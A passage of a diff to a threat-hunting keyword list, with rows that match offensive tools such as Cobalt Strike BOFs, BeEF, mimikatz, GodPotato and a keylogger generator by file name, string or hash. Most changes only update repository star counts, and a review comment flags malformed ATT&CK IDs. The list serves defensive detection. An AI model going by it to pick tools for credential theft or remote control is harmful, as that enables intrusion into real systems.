Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*BeaconJob.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*BeaconJobWriter.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*beaconlogs.json*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" 
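Review bot: The two nimplant rows rewritten in this hunk (`*BeaconGetSpawnTo*` and `*BeaconInjectProcess*`) still carry the technique field `T1059-001 - T1027 - T1036`, with a dash where every other row here uses the dotted sub-technique form, and their tactics field `TA0002 - TA0005 - TA0002` lists TA0002 twice. A consumer that splits these columns and joins on ATT&CK IDs will presumably fail to resolve `T1059-001`, so the fields should read `T1059.001 - T1027 - T1036` and `TA0002 - TA0005`. The two Nightmangle rows also keep the truncated description `ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent`, which should begin with `Nightmangle`. These values are identical on the removed and added sides, since the visible changes only refresh the star and fork counts, so the correction belongs in whatever generates the rows rather than in a hand edit of this file.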
@@ -7721,28 +7867,28 @@
 "*BeaconPrintToStreamW*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z"
 "*BeaconSpawnTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z"
 "*BeaconSpawnTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
-"*BeaconTool -*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
-"*BeaconTool/lib/sleep.jar*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
+"*BeaconTool -*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
+"*BeaconTool/lib/sleep.jar*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
 "*BeaconUseToken*","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z"
 "*beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
-"*beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*beef:beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*beef_bind_tcp-stage.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*beef_bind_tcp-stager.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*beef_bind-stage*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*beef_bind-stage.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*beef_bind-stager.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*beef_test.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*beefproject*","offensive_tool_keyword","beef","The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1210 - T1216 - T1207 - T1189 - T1190 - T1566","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*beef-xss*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*beef:beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*beef_bind_tcp-stage.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*beef_bind_tcp-stager.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*beef_bind-stage*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*beef_bind-stage.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*beef_bind-stager.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*beef_test.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*beefproject*","offensive_tool_keyword","beef","The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1210 - T1216 - T1207 - T1189 - T1190 - T1566","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*beef-xss*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
 "*Beelogger*","offensive_tool_keyword","BeeLogger","Keylogger generator. fake office and acrobat file and malicious executables generator","T1056 - T1105 - T1204 - T1106","TA0003 - TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/4w4k3/BeeLogger","1","1","N/A","N/A","10","902","343","2022-12-02T19:42:41Z","2017-02-17T15:34:39Z"
 "*BeetleChunks/SpoolSploit*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z"
 "*before-create-implant-callback*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z"
 "*before-create-implant-io-bin*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z"
 "*before-find-implant-chunks*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z"
-"*BeichenDream/GodPotato*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z"
+"*BeichenDream/GodPotato*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z"
 "*BeichenDream/SharpToken*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z"
-"*benjamin@gentilkiwi.com*","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*benjamin@gentilkiwi.com*","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
 "*BeRoot*","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1548 - T1574","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z"
